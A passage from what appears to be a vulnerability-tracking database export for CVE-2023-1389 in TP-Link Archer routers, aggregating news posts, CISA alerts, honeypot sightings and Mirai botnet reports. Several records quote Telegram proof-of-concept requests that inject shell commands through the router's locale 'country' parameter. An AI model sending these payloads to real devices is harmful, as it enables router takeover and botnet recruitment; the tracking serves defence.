\u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c CVE-2023-1389 \u0432 \u0443\u0441\u0442\u0440\u043e\u0439\u0441\u0442\u0432\u0430\u0445 TP-Link \u0438 CVE-2018-17532 \u043d\u0430 \u043c\u0430\u0440\u0448\u0440\u0443\u0442\u0438\u0437\u0430\u0442\u043e\u0440\u0430\u0445 Teltonika RUT9XX.\n\n\u041e\u0448\u0438\u0431\u043a\u0430, \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0435\u043c\u0430\u044f \u0434\u043b\u044f \u0432\u0437\u043b\u043e\u043c\u0430 \u0441\u0435\u0442\u0435\u0432\u044b\u0445 \u0432\u0438\u0434\u0435\u043e\u0440\u0435\u0433\u0438\u0441\u0442\u0440\u0430\u0442\u043e\u0440\u043e\u0432 DigiEver, \u043f\u0440\u0435\u0434\u0441\u0442\u0430\u0432\u043b\u044f\u0435\u0442 \u0441\u043e\u0431\u043e\u0439 RCE-\u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u0443\u0434\u0430\u043b\u0435\u043d\u043d\u043e\u0433\u043e \u0432\u044b\u043f\u043e\u043b\u043d\u0435\u043d\u0438\u044f \u043a\u043e\u0434\u0430, \u0438 \u0441\u0432\u044f\u0437\u0430\u043d\u0430 \u0441 URI \u00ab/cgi-bin/cgi_main.cgi\u00bb, \u043a\u043e\u0442\u043e\u0440\u044b\u0439 \u043d\u0435\u043f\u0440\u0430\u0432\u0438\u043b\u044c\u043d\u043e \u043f\u0440\u043e\u0432\u0435\u0440\u044f\u0435\u0442 \u0432\u0432\u043e\u0434\u0438\u043c\u044b\u0435 \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u0435\u043c \u0434\u0430\u043d\u043d\u044b\u0435.\n\n\u042d\u0442\u043e \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u0435\u0442 \u0443\u0434\u0430\u043b\u0435\u043d\u043d\u044b\u043c \u043d\u0435\u0430\u0443\u0442\u0435\u043d\u0442\u0438\u0444\u0438\u0446\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u044b\u043c \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0430\u043c \u0432\u0432\u043e\u0434\u0438\u0442\u044c \u043a\u043e\u043c\u0430\u043d\u0434\u044b \u0442\u0438\u043f\u0430 \u00abcurl\u00bb \u0438 \u00abchmod\u00bb \u0447\u0435\u0440\u0435\u0437 \u043e\u043f\u0440\u0435\u0434\u0435\u043b\u0435\u043d\u043d\u044b\u0435 \u043f\u0430\u0440\u0430\u043c\u0435\u0442\u0440\u044b, \u043d\u0430\u043f\u0440\u0438\u043c\u0435\u0440 \u043f\u043e\u043b\u0435 ntp \u0432 HTTP-\u0437\u0430\u043f\u0440\u043e\u0441\u0430\u0445 POST.\n\nAkamai \u043f\u043e\u043b\u0430\u0433\u0430\u0435\u0442, \u0447\u0442\u043e \u043d\u0430\u0431\u043b\u044e\u0434\u0430\u0435\u043c\u044b\u0435 \u0441\u043e \u0441\u0442\u043e\u0440\u043e\u043d\u044b \u0431\u043e\u0442\u043d\u0435\u0442\u0430 \u0430\u0442\u0430\u043a\u0438, \u043f\u043e\u0445\u043e\u0436\u0438 \u043d\u0430 \u0442\u0435, \u0447\u0442\u043e \u0431\u044b\u043b\u0438 \u043e\u043f\u0438\u0441\u0430\u043d\u044b \u0432 \u043f\u0440\u0435\u0437\u0435\u043d\u0442\u0430\u0446\u0438\u0438 \u0422\u0430-\u041b\u0443\u043d \u0419\u0435\u043d\u0430.\n\n\u0421 \u043f\u043e\u043c\u043e\u0449\u044c\u044e \u0438\u043d\u044a\u0435\u043a\u0446\u0438\u0438 \u043a\u043e\u043c\u0430\u043d\u0434 \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0438 \u043f\u043e\u043b\u0443\u0447\u0430\u044e\u0442 \u0434\u0432\u043e\u0438\u0447\u043d\u044b\u0439 \u0444\u0430\u0439\u043b \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u043e\u0433\u043e \u041f\u041e \u0441 \u0432\u043d\u0435\u0448\u043d\u0435\u0433\u043e \u0441\u0435\u0440\u0432\u0435\u0440\u0430 \u0438 \u0432\u043a\u043b\u044e\u0447\u0430\u044e\u0442 \u0443\u0441\u0442\u0440\u043e\u0439\u0441\u0442\u0432\u043e \u0432 \u0441\u0432\u043e\u044e \u0431\u043e\u0442\u0441\u0435\u0442\u044c. \u0423\u0441\u0442\u043e\u0439\u0447\u0438\u0432\u043e\u0441\u0442\u044c \u0434\u043e\u0441\u0442\u0438\u0433\u0430\u0435\u0442\u0441\u044f \u043f\u0443\u0442\u0435\u043c \u0434\u043e\u0431\u0430\u0432\u043b\u0435\u043d\u0438\u044f \u0437\u0430\u0434\u0430\u043d\u0438\u0439 cron.\n\n\u041f\u043e\u0441\u043b\u0435 \u0432\u0437\u043b\u043e\u043c\u0430 \u0443\u0441\u0442\u0440\u043e\u0439\u0441\u0442\u0432\u043e \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0435\u0442\u0441\u044f \u0434\u043b\u044f \u043f\u0440\u043e\u0432\u0435\u0434\u0435\u043d\u0438\u044f DDoS \u0438\u043b\u0438 \u0434\u043b\u044f \u0440\u0430\u0441\u043f\u0440\u043e\u0441\u0442\u0440\u0430\u043d\u0435\u043d\u0438\u044f \u043d\u0430 \u0434\u0440\u0443\u0433\u0438\u0435 \u0443\u0441\u0442\u0440\u043e\u0439\u0441\u0442\u0432\u0430 \u0441 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u0435\u043c \u043d\u0430\u0431\u043e\u0440\u043e\u0432 \u044d\u043a\u0441\u043f\u043b\u043e\u0439\u0442\u043e\u0432 \u0438 \u0441\u043f\u0438\u0441\u043a\u043e\u0432 \u0443\u0447\u0435\u0442\u043d\u044b\u0445 \u0434\u0430\u043d\u043d\u044b\u0445.\n\n\u041f\u043e \u0434\u0430\u043d\u043d\u044b\u043c Akamai, \u043d\u043e\u0432\u044b\u0439 \u0432\u0430\u0440\u0438\u0430\u043d\u0442 Mirai \u043f\u0440\u0438\u043c\u0435\u0447\u0430\u0442\u0435\u043b\u0435\u043d \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u0435\u043c \u0448\u0438\u0444\u0440\u043e\u0432\u0430\u043d\u0438\u044f XOR \u0438 ChaCha20, \u0430 \u0442\u0430\u043a\u0436\u0435 \u043e\u0440\u0438\u0435\u043d\u0442\u0438\u0440\u043e\u0432\u0430\u043d \u043d\u0430 \u0448\u0438\u0440\u043e\u043a\u0438\u0439 \u0441\u043f\u0435\u043a\u0442\u0440 \u0441\u0438\u0441\u0442\u0435\u043c\u043d\u044b\u0445 \u0430\u0440\u0445\u0438\u0442\u0435\u043a\u0442\u0443\u0440, \u0432\u043a\u043b\u044e\u0447\u0430\u044f x86, ARM \u0438 MIPS.\n\n\u0425\u043e\u0442\u044f \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u0435 \u0441\u043b\u043e\u0436\u043d\u044b\u0445 \u043c\u0435\u0442\u043e\u0434\u043e\u0432 \u0434\u0435\u0448\u0438\u0444\u0440\u043e\u0432\u0430\u043d\u0438\u044f \u043d\u0435 \u044f\u0432\u043b\u044f\u0435\u0442\u0441\u044f \u0447\u0435\u043c-\u0442\u043e \u043d\u043e\u0432\u044b\u043c, \u043e\u043d\u043e \u043f\u0440\u0435\u0434\u043f\u043e\u043b\u0430\u0433\u0430\u0435\u0442 \u0440\u0430\u0437\u0432\u0438\u0442\u0438\u0435 TTPs \u0441\u0440\u0435\u0434\u0438 \u043e\u043f\u0435\u0440\u0430\u0442\u043e\u0440\u043e\u0432 \u0431\u043e\u0442\u043d\u0435\u0442\u043e\u0432 \u043d\u0430 \u0431\u0430\u0437\u0435 Mirai.\n\n\u042d\u0442\u043e \u043e\u0441\u043e\u0431\u0435\u043d\u043d\u043e \u043f\u0440\u0438\u043c\u0435\u0447\u0430\u0442\u0435\u043b\u044c\u043d\u043e, \u043f\u043e\u0441\u043a\u043e\u043b\u044c\u043a\u0443 \u043c\u043d\u043e\u0433\u0438\u0435 \u0431\u043e\u0442\u043d\u0435\u0442\u044b \u043d\u0430 \u0431\u0430\u0437\u0435 Mirai \u043f\u043e-\u043f\u0440\u0435\u0436\u043d\u0435\u043c\u0443 \u0437\u0430\u0432\u0438\u0441\u044f\u0442 \u043e\u0442 \u043e\u0440\u0438\u0433\u0438\u043d\u0430\u043b\u044c\u043d\u043e\u0439 \u043b\u043e\u0433\u0438\u043a\u0438 \u043e\u0431\u0444\u0443\u0441\u043a\u0430\u0446\u0438\u0438 \u0441\u0442\u0440\u043e\u043a \u0438\u0437 \u043f\u0435\u0440\u0435\u0440\u0430\u0431\u043e\u0442\u0430\u043d\u043d\u043e\u0433\u043e \u043a\u043e\u0434\u0430, \u043a\u043e\u0442\u043e\u0440\u044b\u0439 \u0431\u044b\u043b \u0432\u043a\u043b\u044e\u0447\u0435\u043d \u0432 \u0438\u0441\u0445\u043e\u0434\u043d\u044b\u0439 \u043a\u043e\u0434 \u043e\u0440\u0438\u0433\u0438\u043d\u0430\u043b\u044c\u043d\u043e\u0439 \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u043e\u0439 \u043f\u0440\u043e\u0433\u0440\u0430\u043c\u043c\u044b Mirai.\n\nIoC, \u0441\u0432\u044f\u0437\u0430\u043d\u043d\u044b\u0435 \u0441 \u043a\u0430\u043c\u043f\u0430\u043d\u0438\u0435\u0439, \u0430 \u0442\u0430\u043a\u0436\u0435 \u043f\u0440\u0430\u0432\u0438\u043b\u0430 Yara \u0434\u043b\u044f \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0435\u043d\u0438\u044f \u0438 \u0431\u043b\u043e\u043a\u0438\u0440\u043e\u0432\u043a\u0438 \u0443\u0433\u0440\u043e\u0437\u044b - \u0434\u043e\u0441\u0442\u0443\u043f\u043d\u044b \u0432 \u043e\u0442\u0447\u0435\u0442\u0435 Akamai.", "creation_timestamp": "2024-12-26T10:05:42.000000Z"}, {"uuid": "47dd4bb1-258a-43dc-82f4-a4fc0653f388", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-1389", "type": "published-proof-of-concept", "source": "https://t.me/WARLOCK_DARK_ARMY_OFFICIALS/3442", "content": "TP-Link Archer AX21 (AX1800)\ncve-2023-1389\n\nGET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id) HTTP/1.1", "creation_timestamp": "2023-10-16T12:11:22.000000Z"}, {"uuid": "d6b5586e-6bfa-4e25-aa4e-7a055b3911ca", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-1389", "type": "seen", "source": "https://t.me/YE_0x/770", "content": "\u0623\u0636\u0627\u0641\u062a \u0648\u0643\u0627\u0644\u0629 \u0627\u0644\u0623\u0645\u0646 \u0627\u0644\u0633\u064a\u0628\u0631\u0627\u0646\u064a \u0648\u0623\u0645\u0646 \u0627\u0644\u0628\u0646\u064a\u0629 \u0627\u0644\u062a\u062d\u062a\u064a\u0629 \u0627\u0644\u0623\u0645\u0631\u064a\u0643\u064a\u0629 (CISA) \u062b\u0644\u0627\u062b\u0629 \u0639\u064a\u0648\u0628 \u0625\u0644\u0649 \u0643\u062a\u0627\u0644\u0648\u062c \u0627\u0644\u062b\u063a\u0631\u0627\u062a \u0627\u0644\u0645\u0633\u062a\u063a\u0644\u0629 \u0627\u0644\u0645\u0639\u0631\u0648\u0641\u0629 (KEV) \u060c \u0628\u0646\u0627\u0621\u064b \u0639\u0644\u0649 \u062f\u0644\u064a\u0644 \u0639\u0644\u0649 \u0627\u0644\u0627\u0633\u062a\u063a\u0644\u0627\u0644 \u0627\u0644\u0646\u0634\u0637.\n\nCVE-2023-1389 (CVSS score: 8.8) - TP-Link Archer AX-21 Command Injection Vulnerability\nCVE-2021-45046 (CVSS score: 9.0) - Apache Log4j2 Deserialization of Untrusted Data Vulnerability\nCVE-2023-21839 (CVSS score: 7.5) - Oracle WebLogic Server Unspecified Vulnerability\n\n\ud83d\udea8 ===============\n\ud83d\udd30 #0xYE\n\ud83d\udd30 #Cyber_Security\n\ud83d\udd30 #Yemeni_Hackers \n\ud83d\udd30 @YE_0x\n\ud83d\udea8===============", "creation_timestamp": "2023-07-06T16:19:06.000000Z"}, {"uuid": "664646f5-4cf5-400d-8058-3e8fab54fbf9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-1389", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2026-05-01)", "content": "", "creation_timestamp": "2026-05-01T00:00:00.000000Z"}, {"uuid": "ed41e49b-a402-4514-90b9-cd83dee17041", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-1389", "type": "seen", "source": "https://krebsonsecurity.com/2026/04/anti-ddos-firm-heaped-attacks-on-brazilian-isps/", "content": "", "creation_timestamp": "2026-04-30T12:04:26.000000Z"}, {"uuid": "e175ae7b-80fd-457c-90d6-cf20d0644cb1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-1389", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2026-04-30)", "content": "", "creation_timestamp": "2026-04-30T00:00:00.000000Z"}, {"uuid": "18479773-fd3f-455c-8576-79736dfccef3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-1389", "type": "exploited", "source": "https://t.me/xakep_ru/13964", "content": "Mirai-\u0431\u043e\u0442\u043d\u0435\u0442 \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0438\u0440\u0443\u0435\u0442 0-day \u0432 \u0440\u043e\u0443\u0442\u0435\u0440\u0430\u0445 TP-Link\n\n\u0417\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0438 \u0430\u043a\u0442\u0438\u0432\u043d\u043e \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u044e\u0442 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c CVE-2023-1389 \u0432 Wi-Fi \u043c\u0430\u0440\u0448\u0440\u0443\u0442\u0438\u0437\u0430\u0442\u043e\u0440\u0430\u0445 TP-Link Archer A21 (AX1800), \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0435\u043d\u043d\u0443\u044e \u043d\u0430 \u0445\u0430\u043a\u0435\u0440\u0441\u043a\u043e\u043c \u0441\u043e\u0440\u0435\u0432\u043d\u043e\u0432\u0430\u043d\u0438\u0438 Pwn2Own \u0432 \u0434\u0435\u043a\u0430\u0431\u0440\u0435 \u043f\u0440\u043e\u0448\u043b\u043e\u0433\u043e \u0433\u043e\u0434\u0430. \u0423\u0441\u043f\u0435\u0448\u043d\u043e \u0432\u0437\u043b\u043e\u043c\u0430\u043d\u043d\u044b\u0435 \u0443\u0441\u0442\u0440\u043e\u0439\u0441\u0442\u0432\u0430 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u044e\u0442\u0441\u044f \u0432 DDoS-\u0430\u0442\u0430\u043a\u0430\u0445.\n\nhttps://xakep.ru/2023/04/26/mirai-tp-link/", "creation_timestamp": "2023-04-26T13:34:38.000000Z"}, {"uuid": "df0d0b32-c842-468e-991c-d8cb3fc54286", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-1389", "type": "exploited", "source": "https://t.me/thehackernews/3303", "content": "Heads up, everyone! \n \nCISA has issued an advisory warning of active exploitation of three known vulnerabilities, including CVE-2023-1389 (TP-Link Archer AX-21), CVE-2021-45046 (Apache Log4j2) and CVE-2023-21839 (Oracle WebLogic). \n \nDetails: https://thehackernews.com/2023/05/active-exploitation-of-tp-link-apache.html", "creation_timestamp": "2023-05-02T07:47:51.000000Z"}, {"uuid": "fcf67bfe-1432-4c46-b59b-bb04a78e3211", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-1389", "type": "exploited", "source": "https://t.me/thehackernews/6471", "content": "\u26a0\ufe0f A new botnet, Ballista, is exploiting unpatched TP-Link Archer routers through the CVE-2023-1389 vulnerability. \n\nThis critical flaw allows attackers to execute remote code, triggering widespread malware infections. Thousands of devices, including those in healthcare and manufacturing, are at risk.\n\nRead the full analysis here: https://thehackernews.com/2025/03/ballista-botnet-exploits-unpatched-tp.html", "creation_timestamp": "2025-03-11T14:37:38.000000Z"}, {"uuid": "c6dcc987-481e-4162-894a-8ac4dd639bf5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-1389", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2026-05-02)", "content": "", "creation_timestamp": "2026-05-02T00:00:00.000000Z"}, {"uuid": "548dbc1e-3df1-4f1f-beda-f4c8bbf732cd", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-1389", "type": "published-proof-of-concept", "source": "Telegram/ZeP5vajwBjRtVQ5JRxWlsGO4FPItGOx5n-9omDq1pchppCB8Hg", "content": "", "creation_timestamp": "2024-08-09T22:27:33.000000Z"}, {"uuid": "f0ae8f87-4758-49fa-84ce-5879d8c91cfd", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-1389", "type": "published-proof-of-concept", "source": "https://t.me/CNArsenal/693", "content": "cve-2023-1389\n\nPOST /cgi-bin/luci/;stok=/locale?form=country HTTP/1.1 Host:  Content-Type: application/x-www-form-urlencoded operation=write&country=$(id>/tmp/out)\n\n#poc", "creation_timestamp": "2023-07-07T08:58:04.000000Z"}, {"uuid": "f27fffd2-f819-4a6f-b15a-48845dafb64f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-1389", "type": "exploited", "source": "https://t.me/CyberSecurityTechnologies/8189", "content": "#exploit\n1. CVE-2023-21987, CVE-2023-21991:\nOracle VirtualBox (Core) Vulnerabilities\nhttps://qriousec.github.io/post/vbox-pwn2own-2023\n\n2. CVE-2023-1389:\nTP-Link Archer/Qrious Security - WAN-side entry\nhttps://www.zerodayinitiative.com/blog/2023/4/21/tp-link-wan-side-vulnerability-cve-2023-1389-added-to-the-mirai-botnet-arsenal", "creation_timestamp": "2023-04-26T11:03:01.000000Z"}, {"uuid": "0beeac65-e1a4-419d-9bb0-f1551acaecd6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-1389", "type": "published-proof-of-concept", "source": "https://t.me/CNArsenal/1300", "content": "TP-Link Archer AX21 (AX1800)\ncve-2023-1389\n\nGET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id) HTTP/1.1\n\n#poc #exploit", "creation_timestamp": "2023-10-18T07:28:30.000000Z"}, {"uuid": "2f073215-5c41-49d0-9fac-51df3d1def54", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-1389", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2026-05-03)", "content": "", "creation_timestamp": "2026-05-03T00:00:00.000000Z"}]}